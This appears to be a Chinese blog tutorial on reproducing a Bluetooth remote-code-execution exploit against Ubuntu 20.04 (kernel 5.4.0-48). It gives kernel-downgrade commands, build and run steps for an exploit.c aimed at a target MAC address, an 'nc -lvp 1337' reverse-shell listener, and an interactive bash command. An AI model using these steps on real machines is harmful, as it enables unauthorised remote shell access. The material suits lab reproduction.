目录
一.准备工作:
环境:
1.攻击主机内核、ubuntu版本随意,被攻击主机内核版本为5.4.0-48-generic、ubuntu20.04
2.两台机器处于同一个路由器之下,若是被攻击主机为公网ip应该也行(未验证)
3.更换内核
3.1 虚拟机降版本教程VMware虚拟安装Ubuntu,然后切换Ubuntu内核版本_ubuntu开机切换内核-CSDN博客
3.2 实机内核降版本(5.13->5.4.0-48)
uname -r
#查询内核版本
sudo apt update
#更新软件包列表
sudo apt install linux-image-5.4.0-48-generic
linux-headers-5.4.0-48-generic
#安装指定版本的 Linux 内核镜像和头文件
sudo update-grub
#安装新的内核后,需要更新引导加载程序(GRUB)的配置,以便系统能够启动新的内核。
sudo reboot
#重启
uname -r
#验证内核版本
如果用的是两台虚拟机,需配置单独的蓝牙:VMware为多台虚拟机配置单独蓝牙-CSDN博客
二.复现
1.使用gcc进行编译:
gcc -o exploit exploit.c -lbluetooth
2.执行可执行文件,target_mac是要攻击机器的蓝牙mac地址,source_ip、source_port为本机的:
sudo ./exploit target_mac source_ip source_port
3.在另一个终端中,运行(同一台机器):
nc -lvp 1337
报错:执行nc -lvp 1337 后
nc: getnameinfo: Temporary failure in name resolution
解决:
sudo gedit /etc/resolv.conf
添加:
nameserver 8.8.8.8
nameserver 8.8.4.4
4.运行
exec bash -i 2>&0 1>&0